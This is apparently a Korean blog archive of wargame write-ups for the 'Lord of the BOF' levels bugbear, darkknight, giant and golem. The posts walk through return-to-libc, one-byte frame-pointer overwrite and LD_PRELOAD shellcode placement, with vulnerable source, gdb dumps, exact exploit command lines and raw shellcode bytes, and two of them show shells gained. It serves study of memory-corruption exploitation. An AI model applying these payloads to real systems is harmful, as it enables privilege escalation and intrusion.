'Wargame > LOB (Redhat9)' 카테고리의 다른 글

zombie_assassin -> succubus (0)	2014.02.20
assassin -> zombie_assassin (0)	2014.02.20
bugbear -> giant (0)	2014.02.20
darkknight -> bugbear (0)	2014.02.20
golem -> darkknight (0)	2014.02.20

Posted by windowhan

,

bugbear -> giant

Wargame/LOB (Redhat9) 2014. 2. 20. 15:19

문제는 다음과 같다.

[bugbear@localhost tmp]$ cat ../giant.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - giant
        - RTL2
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(int argc, char *argv[])
{
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // gain address of execve
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/aw                        k '{print $4}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);
        fclose(fp);

        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '                        {print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);

        execve_addr = lib_addr + (int)execve_offset;
        // end

        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
                printf("You must use execve!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

여기서는 execve함수만을 써야한다.

execve함수로 인자구성을 해주려면

execve("실행시킬문자열",실행시킬문자열의 포인터,NULL)이 필요하다.

즉, execve("/bin/sh",&("/bin/sh"),0) 이런 식이 필요하다.

처음에는 R이랑 R2라는 환경변수에 각각 /bin/sh의 주소값과 엄청난 널값을 넣고 해보려고 했다.

0xbffffdca:      "R2="
0xbffffdce:      "USER=bugbear"
0xbffffddb:      "BASH_ENV=/home/bugbear/.bashrc"
0xbffffdfa:      "LANG=en_US"
0xbffffe05:      "R=u¿\017@"
0xbffffe0c:      "OSTYPE=Linux"
0xbffffe19:      "SHLVL=1"

그러나 변수가 위치한 주소는 내가 의도했던 주소랑 전혀 달랐다.

거기에다가 알파벳의 가장 마지막인 Z로 해서 널값과 가까이해서 페이로드를 구성해봤지만,

그것은 나의 착각이었다.

그 사이 가운데에 널값이 들어 있을 것이라고 생각을 했었지만, 다른 값이 들어있었다.

0xbffffe12:      "Z=u¿\017@"
0xbffffe19:      "SHLVL=1"
0xbffffe21:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;---Type <return> to continue, or q <return> to quit---
32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffee9:      ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbfffffb1:      "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffe4:      "/home/bugbear/tmp/giant"
0xbffffffc:      ""

그래서 이용하기로 생각한것이 argv였다.

argv[0]은 스택의 맨 마지막에도 찌꺼기가 남는다.

0xbfffffe4: "/home/bugbear/tmp/giant" 와 같이 말이다.

일부로 파일명을 "/bin/sh"의 문자열의 주소를 가리키는 주소로 변경한 뒤, 그 주소를 가리키는 포인터로 인자구성을 하면 된다.

그리고 execve로 인자구성을 하려면 바로 뒤에 null문자가 와야한다.

./`perl -e 'print "\xf9\xbf\x0f\x40"'` "`perl -e 'print "\x48\x9d\x0a\x40"x12,"\xe0\x91\x03\x40","\xf9\xbf\x0f\x40","\xf7\xff\xff\xbf","\xfc\xff\xff\xbf"'`"

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

assassin -> zombie_assassin (0)	2014.02.20
giant -> assassin (0)	2014.02.20
darkknight -> bugbear (0)	2014.02.20
golem -> darkknight (0)	2014.02.20
skeleton -> golem (0)	2014.02.20

Posted by windowhan

,

darkknight -> bugbear

Wargame/LOB (Redhat9) 2014. 2. 20. 15:19

기초적인 RTL문제였다.

난이도로 따지면 이전문제보다 더 쉬운정도 ㅋㅋㅋ

system함수를 사용했다.

문제는 다음과 같다.

[darkknight@localhost darkknight]$ cat bugbear.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - bugbear
        - RTL1
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack betrayed you!!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

/bin/bash문자열을 찾는 소스는 다음과 같다

int main(int argc,char **argv)
{
       long shell;
       shell = 0x40058ae0; // system함수의 주소를 넣음.

       while(memcmp((void *)shell,"/bin/sh",8))shell++;
       printf("\"/bin/sh\" is at 0x%x\n",shell);
}

[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\xe0\x8a\x05\x40
"x12,"aaaa","\xf9\xbf\x0f\x40"'`
?@?@?@?@?@?@?@?@?@?@?@?@aaaa廈@
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) grou
ps=512(darkknight)
bash$ my-pass
euid = 513
new divide

OS가 Redhat 6.2라서 system함수 안에 getuid()함수가 없으므로 사용할 수 있었다.

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

giant -> assassin (0)	2014.02.20
bugbear -> giant (0)	2014.02.20
golem -> darkknight (0)	2014.02.20
skeleton -> golem (0)	2014.02.20
vampire -> skeleton (0)	2014.02.20

Posted by windowhan

,

golem -> darkknight

Wargame/LOB (Redhat9) 2014. 2. 20. 15:18

일단 소스를 보면,

[golem@localhost golem]$ cat darkknight.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkknight
        - FPO
*/

#include <stdio.h>
#include <stdlib.h>

void problem_child(char *src)
{
        char buffer[40];
        strncpy(buffer, src, 41);
        printf("%s\n", buffer);
}

main(int argc, char *argv[])
{
        if(argc<2){
                printf("argv error\n");
                exit(0);
        }

        problem_child(argv[1]);
}

힌트로 위에 FPO가 나와있는데 "~~stack~~ Frame Pointer Operation"의 약자인 것 같다. (SFPO가 아니네요 ㅋㅋ)

0x8048440 <problem_child>: push %ebp
0x8048441 <problem_child+1>: mov %esp,%ebp

이 부분은 함수 프롤로그 부분인데

예전 함수의 ebp를 백업하는 부분이다.

지금은 main함수 안에서 problem_child라는 함수 안으로 들어와 있는데, 함수가 종료할 때, 이전 함수의 Base Pointer를 찾아가기 위해서이다.

조작된 sfp를 갖고 나와서

leave ret이 진행 되므로

mov %ebp,%esp

pop %ebp

를 수행한다.

즉 ebp를 esp가 가리키는 곳에 넣는다. 그리고 그 ebp를 pop하면서 esp+4가 된다.

따라서 sfp가 가리키는곳의 +4가 main함수의 return address인 것이다.

problem_child함수의 ebp(main함수 관점에서 sfp)+4는 main함수의 return address이다.

따라서 여기서는 strncpy함수로 인해서 sfp의 단 1바이트만을 조작할 수 있다.

(gdb) disas problem_child
Dump of assembler code for function problem_child:
0x8048440 <problem_child>:      push   %ebp
0x8048441 <problem_child+1>:    mov    %esp,%ebp
0x8048443 <problem_child+3>:    sub    $0x28,%esp
0x8048446 <problem_child+6>:    push   $0x29
0x8048448 <problem_child+8>:    mov    0x8(%ebp),%eax
0x804844b <problem_child+11>:   push   %eax
0x804844c <problem_child+12>:   lea    0xffffffd8(%ebp),%eax
0x804844f <problem_child+15>:   push   %eax
0x8048450 <problem_child+16>:   call   0x8048374 <strncpy>
0x8048455 <problem_child+21>:   add    $0xc,%esp
0x8048458 <problem_child+24>:   lea    0xffffffd8(%ebp),%eax
0x804845b <problem_child+27>:   push   %eax
0x804845c <problem_child+28>:   push   $0x8048500
0x8048461 <problem_child+33>:   call   0x8048354 <printf>
0x8048466 <problem_child+38>:   add    $0x8,%esp
0x8048469 <problem_child+41>:   leave
0x804846a <problem_child+42>:   ret
0x804846b <problem_child+43>:   nop
End of assembler dump.
(gdb) Quit
(gdb) b *problem_child+38
Breakpoint 2 at 0x8048466
(gdb) r `perl -e 'print "A"x40'`
Starting program: /home/golem/tmp/darkknight `perl -e 'print "A"x40'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, 0x8048466 in problem_child ()
(gdb) x/100x $ebp
0xbffff9ac:     0xbffff900      0x0804849e      0xbffffb2f      0xbffff9d8
0xbffff9bc:     0x400309cb      0x00000002      0xbffffa04      0xbffffa10
0xbffff9cc:     0x40013868      0x00000002      0x08048390      0x00000000
0xbffff9dc:     0x080483b1      0x0804846c      0x00000002      0xbffffa04
0xbffff9ec:     0x080482e4      0x080484dc      0x4000ae60      0xbffff9fc
0xbffff9fc:     0x40013e90      0x00000002      0xbffffb14      0xbffffb2f
0xbffffa0c:     0x00000000      0xbffffb58      0xbffffb7a      0xbffffb84
0xbffffa1c:     0xbffffb92      0xbffffbb1      0xbffffbbf      0xbffffbd8
0xbffffa2c:     0xbffffbf3      0xbffffc12      0xbffffc1d      0xbffffc2b
0xbffffa3c:     0xbffffc6c      0xbffffc7f      0xbffffc90      0xbffffca5
0xbffffa4c:     0xbffffcae      0xbffffcbe      0xbffffcc9      0xbffffdbd
0xbffffa5c:     0xbffffdda      0xbffffde6      0xbffffdf1      0xbffffe02
0xbffffa6c:     0xbffffe16      0xbffffe1e      0x00000000      0x00000003
0xbffffa7c:     0x08048034      0x00000004      0x00000020      0x00000005
0xbffffa8c:     0x00000006      0x00000006      0x00001000      0x00000007
0xbffffa9c:     0x40000000      0x00000008      0x00000000      0x00000009
0xbffffaac:     0x08048390      0x0000000b      0x000001ff      0x0000000c
0xbffffabc:     0x000001ff      0x0000000d      0x000001ff      0x0000000e
0xbffffacc:     0x000001ff      0x00000010      0x0febfbff      0x0000000f
0xbffffadc:     0xbffffb0f      0x00000000      0x00000000      0x00000000
0xbffffaec:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffafc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb0c:     0x69000000      0x00363836      0x6d6f682f      0x6f672f65
0xbffffb1c:     0x2f6d656c      0x2f706d74      0x6b726164      0x67696e6b
0xbffffb2c:     0x41007468      0x41414141      0x41414141      0x41414141
(gdb)
0xbffffb3c:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb4c:     0x41414141      0x41414141      0x00414141      0x5353454c

현재 공격자가 입력한 데이터가 0xbfffb~~ 쯤에 들어가는 것을 볼 수가 있다.

SFP를 1바이트 조작할 수 있으니, 공격자가 입력한 데이터를 가리키는 주소 값들이 위치한 주소로 overwrite하면 된다.

현재 ebp는 0xbffff9~~ 대 이니까, 0xbffff900 ~ 0xbffff9ff 까지 조작 할 수 있다.

(gdb) x/100x $ebp-200
0xbffff8e4:     0x4001ad70      0x400143e0      0x00000003      0x40014650
0xbffff8f4:     0x00000001      0xbffff910      0x08048170      0x400140d4
0xbffff904:     0x078e530f      0xbffff98c      0xbffff944      0x4000a7fd
0xbffff914:     0x400143d0      0x400146b0      0x00000007      0x4000a74e
0xbffff924:     0x401081ec      0x4000ae60      0xbffffa04      0x400143e0
0xbffff934:     0x40021df0      0x401088c0      0x4002982c      0x40021df0
0xbffff944:     0xbffff974      0x4000a970      0xbffffb58      0xbffff9ac
0xbffff954:     0x4005d920      0x400143e0      0xbffff974      0x40066070
0xbffff964:     0x40106980      0x08048500      0xbffff984      0x401081ec
0xbffff974:     0xbffff9ac      0x08048466      0x08048500      0xbffff984
0xbffff984:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff994:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff9a4:     0x41414141      0x41414141      0xbffff900      0x0804849e
0xbffff9b4:     0xbffffb2f      0xbffff9d8      0x400309cb      0x00000002
0xbffff9c4:     0xbffffa04      0xbffffa10      0x40013868      0x00000002
0xbffff9d4:     0x08048390      0x00000000      0x080483b1      0x0804846c
0xbffff9e4:     0x00000002      0xbffffa04      0x080482e4      0x080484dc
0xbffff9f4:     0x4000ae60      0xbffff9fc      0x40013e90      0x00000002
0xbffffa04:     0xbffffb14      0xbffffb2f      0x00000000      0xbffffb58
0xbffffa14:     0xbffffb7a      0xbffffb84      0xbffffb92      0xbffffbb1
0xbffffa24:     0xbffffbbf      0xbffffbd8      0xbffffbf3      0xbffffc12
0xbffffa34:     0xbffffc1d      0xbffffc2b      0xbffffc6c      0xbffffc7f
0xbffffa44:     0xbffffc90      0xbffffca5      0xbffffcae      0xbffffcbe
0xbffffa54:     0xbffffcc9      0xbffffdbd      0xbffffdda      0xbffffde6
0xbffffa64:     0xbffffdf1      0xbffffe02      0xbffffe16      0xbffffe1e
(gdb)

빨간색으로 칠해져 있는 부분이 입력한 데이터 값이다.

저곳에 0x41414141 이런 문자들 말고, 쉘코드를 넣은 환경변수의 주소를 10개정도 넣은 뒤 맨 마지막 한 바이트를 84(여기서는 84)로 overwrite해주면 된다.

[golem@localhost golem]$ ./darkknight `perl -e 'print "\xd1\xfd\xff\xbf"x10,"\xa4"'`
Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿¤uy¿ž-uy¿euy¿E @
bash$ my-pass
euid = 512
new attacker
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

bugbear -> giant (0)	2014.02.20
darkknight -> bugbear (0)	2014.02.20
skeleton -> golem (0)	2014.02.20
vampire -> skeleton (0)	2014.02.20
troll -> vampire (0)	2014.02.20

Posted by windowhan

,

skeleton -> golem

Wargame/LOB (Redhat9) 2014. 2. 20. 15:17

LD_PRELOAD 를 사용하라는 힌트를 받았다.

LD_PRELOAD는 공유라이브러리의 경로를 지정해주는 환경변수이다.

따라서 이 LD_PRELOAD에 실린 경로는 공유라이브러리 로써 가장 먼저 탑재가 되고, 스택의 하단에 위치한다.

LD_PRELOAD로 인해서 실행시키는 프로그램의 함수를 후킹 할 수 있는데, 여기서는 단순하게 파일명을 스택에 남기는 용으로 사용한다.

[skeleton@localhost tmp]$ vi `perl -e 'print "A"x100,".c"'`

[skeleton@localhost tmp]$ gcc -o `perl -e 'print "A"x100,".so"'` `perl -e 'print "A"x100,".c"'` -fPIC -shared

[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "A"x100,".so"'`

0xbffff5c0:     0x00000002      0x40023fd0      0x00000000      0x00000000
0xbffff5d0:     0x40013868      0x40000814      0x400041b0      0x00000001
0xbffff5e0:     0xbffff5ec      0x40001528      0x000002c8      0x00000000
0xbffff5f0:     0x080482d0      0x00000000      0x00000001      0x40000824
0xbffff600:     0xbffff60c      0x400075bb      0x40017000      0x00002fb2
0xbffff610:     0x40013868      0xbffff7c4      0x4000380e      0x40014450
0xbffff620:     0x6d6f682f      0x6b732f65      0x74656c65      0x742f6e6f
0xbffff630:     0x412f706d      0x41414141      0x41414141      0x41414141
0xbffff640:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff650:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff660:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff670:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff680:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff690:     0x41414141      0x2e414141      0x40006f73      0x40013868
0xbffff6a0:     0x4000220c      0xbffffbc7      0x00000000      0x00000000
0xbffff6b0:     0x00000000      0x00000000      0x40014a00      0x00000000
0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000006
0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff700:     0x00000000      0x00000001      0x00000000      0x00000001
0xbffff710:     0xbffff61c      0x00060000      0x00000000      0x00000000
0xbffff720:     0x00000000      0x00000001      0x00000000      0x00000000

이렇게 다 밀려도 살아있다.

[skeleton@localhost tmp]$ gcc -o `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"'` `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'` -fPIC -shared

[skeleton@localhost tmp]$ vi `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'`

[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"
> '`

[skeleton@localhost tmp]$ gdb -q ./golem
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>:       push   %ebp
0x8048471 <main+1>:     mov    %esp,%ebp
0x8048473 <main+3>:     sub    $0x2c,%esp
0x8048476 <main+6>:     cmpl   $0x1,0x8(%ebp)
0x804847a <main+10>:    jg     0x8048493 <main+35>
0x804847c <main+12>:    push   $0x8048570
0x8048481 <main+17>:    call   0x8048378 <printf>
0x8048486 <main+22>:    add    $0x4,%esp
0x8048489 <main+25>:    push   $0x0
0x804848b <main+27>:    call   0x8048388 <exit>
0x8048490 <main+32>:    add    $0x4,%esp
0x8048493 <main+35>:    mov    0xc(%ebp),%eax
0x8048496 <main+38>:    add    $0x4,%eax
0x8048499 <main+41>:    mov    (%eax),%edx
0x804849b <main+43>:    add    $0x2f,%edx
0x804849e <main+46>:    cmpb   $0xbf,(%edx)
0x80484a1 <main+49>:    je     0x80484c0 <main+80>
0x80484a3 <main+51>:    push   $0x804857c
0x80484a8 <main+56>:    call   0x8048378 <printf>
0x80484ad <main+61>:    add    $0x4,%esp
0x80484b0 <main+64>:    push   $0x0
0x80484b2 <main+66>:    call   0x8048388 <exit>
0x80484b7 <main+71>:    add    $0x4,%esp
0x80484ba <main+74>:    lea    0x0(%esi),%esi
0x80484c0 <main+80>:    mov    0xc(%ebp),%eax
0x80484c3 <main+83>:    add    $0x4,%eax
0x80484c6 <main+86>:    mov    (%eax),%edx
0x80484c8 <main+88>:    push   %edx
0x80484c9 <main+89>:    lea    0xffffffd8(%ebp),%eax
0x80484cc <main+92>:    push   %eax
0x80484cd <main+93>:    call   0x80483a8 <strcpy>
0x80484d2 <main+98>:    add    $0x8,%esp
0x80484d5 <main+101>:   lea    0xffffffd8(%ebp),%eax
0x80484d8 <main+104>:   push   %eax
0x80484d9 <main+105>:   push   $0x8048599
0x80484de <main+110>:   call   0x8048378 <printf>
0x80484e3 <main+115>:   add    $0x8,%esp
0x80484e6 <main+118>:   push   $0x2c
0x80484e8 <main+120>:   push   $0x0
0x80484ea <main+122>:   lea    0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x80484ed <main+125>:   push   %eax
0x80484ee <main+126>:   call   0x8048398 <memset>
0x80484f3 <main+131>:   add    $0xc,%esp
0x80484f6 <main+134>:   lea    0xffffffd8(%ebp),%eax
0x80484f9 <main+137>:   mov    $0xbfffffcf,%edx
0x80484fe <main+142>:   mov    %edx,%ecx
0x8048500 <main+144>:   sub    %eax,%ecx
0x8048502 <main+146>:   mov    %ecx,%eax
0x8048504 <main+148>:   push   %eax
0x8048505 <main+149>:   push   $0x0
0x8048507 <main+151>:   lea    0xffffffd8(%ebp),%eax
0x804850a <main+154>:   lea    0x30(%eax),%edx
0x804850d <main+157>:   push   %edx
0x804850e <main+158>:   call   0x8048398 <memset>
0x8048513 <main+163>:   add    $0xc,%esp
0x8048516 <main+166>:   leave
0x8048517 <main+167>:   ret
0x8048518 <main+168>:   nop
0x8048519 <main+169>:   nop
0x804851a <main+170>:   nop
0x804851b <main+171>:   nop
0x804851c <main+172>:   nop
0x804851d <main+173>:   nop
0x804851e <main+174>:   nop
0x804851f <main+175>:   nop
End of assembler dump.
(gdb)
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r `perl -e 'print Quit
(gdb) Quit
(gdb) Quit
(gdb) r `perl -e 'print "\xbf"x48'`
Starting program: /home/skeleton/tmp/./golem `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Breakpoint 1, 0x8048517 in main ()
(gdb) x/1000x 0xbfff000
0xbfff000:      Cannot access memory at address 0xbfff000
(gdb) x/1000x 0xbfffff0
0xbfffff0:      Cannot access memory at address 0xbfffff0
(gdb) x/1000x 0xbffff000
0xbffff000:     0x00000583      0x000006de      0x00000432      0x0000013f
0xbffff010:     0x0000016e      0x000002f1      0x00000000      0x00000420
0xbffff020:     0x000006c0      0x0000052e      0x0000046c      0x00000000
0xbffff030:     0x000004cd      0x00000660      0x00000000      0x000001af
0xbffff040:     0x0000048a      0x4002bb0e      0xbffff118      0x400081e6
0xbffff050:     0x4002bad5      0x4002bad5      0x40013868      0x40014930
0xbffff060:     0x0000598c      0x00000259      0x00000000      0x00000591
0xbffff070:     0x000006ea      0x000006ec      0x0000028f      0x000005bb
0xbffff080:     0x000006ce      0x00005450      0x000003c7      0x000006c2
0xbffff090:     0x00000000      0x0000070b      0x400221c0      0x00000545
0xbffff0a0:     0x40023fd0      0x4001cd70      0x40014930      0x00000004
0xbffff0b0:     0x40014ba0      0x00000002      0xbffff0d0      0x400221c0
0xbffff0c0:     0x40014b34      0x03c40f19      0xbffff14c      0x4002995c
0xbffff0d0:     0x400221c0      0x40014930      0x4002bad5      0x4002bad5
0xbffff0e0:     0x40013868      0x40014930      0x0000590a      0x0000065b
0xbffff0f0:     0x00000561      0x000005cc      0x00000000      0x40001402
0xbffff100:     0xbffff1d0      0x40008134      0x40000c7d      0x40024f23
0xbffff110:     0x40013868      0x40014930      0x00000f53      0x4000a7fd
0xbffff120:     0x40014920      0x40014c58      0x00000007      0x4000a74e
0xbffff130:     0x4010a1ec      0xbffff1d1      0x00000000      0x00000180
0xbffff140:     0x400221c0      0x4010a710      0x00000000      0x400221c0
0xbffff150:     0x40000474      0x00000000      0x40000824      0x400002f4
0xbffff160:     0x40013c00      0x00000004      0x40014ba0      0x00000004
0xbffff170:     0xbffff188      0x4001dd60      0x40014b3c      0x056e90c5
0xbffff180:     0xbffff204      0x40024f23      0x4001dd60      0x40014930
0xbffff190:     0x000000bd      0x4002bb0e      0xbffff268      0x400081e6
0xbffff1a0:     0x4002bad5      0x4002bad5      0x40013868      0x40014930
0xbffff1b0:     0x0000187f      0x00000001      0x4001fe70      0x00000310
0xbffff1c0:     0x40023fd0      0x4001cd70      0x40014930      0x00000004
0xbffff1d0:     0xbffff208      0x4000a7fd      0x40014920      0x40014c58
0xbffff1e0:     0x40001402      0xbffff2b4      0x40008134      0x40000ec9
0xbffff1f0:     0x40025713      0x40013868      0x40014930      0x00001743
0xbffff200:     0x40024f23      0x4001dd60      0xbffff248      0x4000a970
0xbffff210:     0x40017000      0x40108980      0x400c0b00      0x00000000
0xbffff220:     0x40000ec9      0x400707e4      0x00000001      0x00000000
0xbffff230:     0x00000031      0x40000664      0x00000000      0x40000824
0xbffff240:     0x400002f4      0x40013c00      0x00000004      0x40014ba0
0xbffff250:     0x00000004      0xbffff26c      0x4001e4f0      0x40014b3c
0xbffff260:     0x00dc28f5      0xbffff2e8      0x40025713      0x4001e4f0
0xbffff270:     0x40014930      0x40108980      0x40017000      0x00000031
0xbffff280:     0x4010a1ec      0x40108980      0xbffff2a8      0x4006fa3e
---Type <return> to continue, or q <return> to quit---
0xbffff290:     0x40108980      0x40017000      0x00000031      0x4010a1ec
0xbffff2a0:     0x00000001      0x40108980      0xbffff2bc      0x400711c7
0xbffff2b0:     0x40108980      0xbffff2ec      0x4000a7fd      0x40014920
0xbffff2c0:     0x40014c58      0x00000007      0x4000a74e      0x4010a1ec
0xbffff2d0:     0x0804859c      0x00000001      0x40014930      0x4001e4f0
0xbffff2e0:     0x4010a320      0x40025713      0x4001e4f0      0xbffff9a4
0xbffff2f0:     0x4000a970      0x40108980      0x00000400      0x4006c2e4
0xbffff300:     0x40014930      0xbffff9a4      0x4006428b      0x40108980
0xbffff310:     0x4010a1ec      0x4000ae60      0xbffffa44      0x00000000
0xbffff320:     0x0000675b      0x000081a4      0x00000001      0x00000000
0xbffff330:     0x00000000      0x00000808      0x00000000      0x00000000
0xbffff340:     0x00008561      0x000081ed      0x00000001      0x00000000
0xbffff350:     0x40001402      0xbffff424      0x400081e6      0x400013e1
0xbffff360:     0x400013e1      0x40013868      0x400013a5      0x40000824
0xbffff370:     0x400013d3      0x40013c00      0x40014b90      0x0000000e
0xbffff380:     0x40013e80      0x0804859c      0x250014c4      0x00000000
0xbffff390:     0x00000001      0x4002bad5      0x40001353      0x00000000
0xbffff3a0:     0xbffff428      0x40000814      0x00000052      0x40000824
0xbffff3b0:     0x400002f4      0x40013c00      0x00000004      0x40014ba0
0xbffff3c0:     0x00000003      0xbffff3dc      0x40000814      0x400140d4
0xbffff3d0:     0x0b725f23      0xbffff4b8      0x400013a5      0x40000814
0xbffff3e0:     0x40013c00      0x400002f4      0x40013c00      0x00000000
0xbffff3f0:     0x00000000      0x00000004      0x40014ba0      0x00000004
0xbffff400:     0xbffff420      0x40000674      0x400140d8      0x01ee5739
0xbffff410:     0xbffff4b8      0x40000edc      0x40013868      0x40013c00
0xbffff420:     0x00000000      0xbffff4e8      0x4000966a      0x080480f4
0xbffff430:     0x40014cf8      0x00000007      0x40013868      0x00000000
0xbffff440:     0x40013e70      0x40000814      0x40009c50      0x00005207
0xbffff450:     0x4001a0dc      0x4001a0dc      0x4001a0e8      0x00000018
0xbffff460:     0x400017f4      0x00000004      0x4001a0e8      0x40013c00
0xbffff470:     0xbffff4d0      0x2073f4cc      0xffffffff      0xffffffd0
0xbffff480:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff490:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff4a0:     0xbffff9d0      0x00000002      0x40023fd0      0x40013c00
0xbffff4b0:     0x4000ba15      0x00000000      0x00000000      0x00000001
0xbffff4c0:     0xbffff9c8      0xbffff9a3      0x0804859b      0x08048599
0xbffff4d0:     0x00000031      0xffffffff      0x00000000      0x00000001
0xbffff4e0:     0x40000824      0xbffff4f0      0x400075bb      0x40017000
0xbffff4f0:     0x00002fb2      0x40013868      0xbffff734      0x4000380e
0xbffff500:     0x400144d8      0x6d6f682f      0x6b732f65      0x74656c65
0xbffff510:     0x742f6e6f      0x902f706d      0x90909090      0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffff520:     0x90909090      0x0804859c      0x90909090      0x90909090
0xbffff530:     0x90909090      0x90909090      0x00000000      0x00000000
0xbffff540:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff550:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff560:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff570:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff580:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff590:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5a0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5c0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5d0:     0x90909090      0x90909090      0x90909090      0x68909090
0xbffff5e0:     0x81cee28a      0x530cb168      0x6f6a6854      0x0168e48a
0xbffff5f0:     0x68633069      0x69743069      0xfe59146a      0x79490c0c
0xbffff600:     0xe1f741fa      0x732ec354      0x4000006f      0x40013868
0xbffff610:     0x4000220c      0xbffffb3c      0x00000000      0x00000000
0xbffff620:     0x00000000      0x00000000      0x40014b00      0x00000000
0xbffff630:     0x00000000      0x00000000      0x00000000      0x00000006
0xbffff640:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff650:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff660:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff670:     0x00000000      0x00000001      0x00000000      0x00000001
0xbffff680:     0xbffff500      0x00060000      0x00000000      0x00000000
0xbffff690:     0x00000000      0x00000001      0x00000000      0x00000000
0xbffff6a0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6b0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff700:     0x00000000      0x00000000      0x00000000      0x00000000
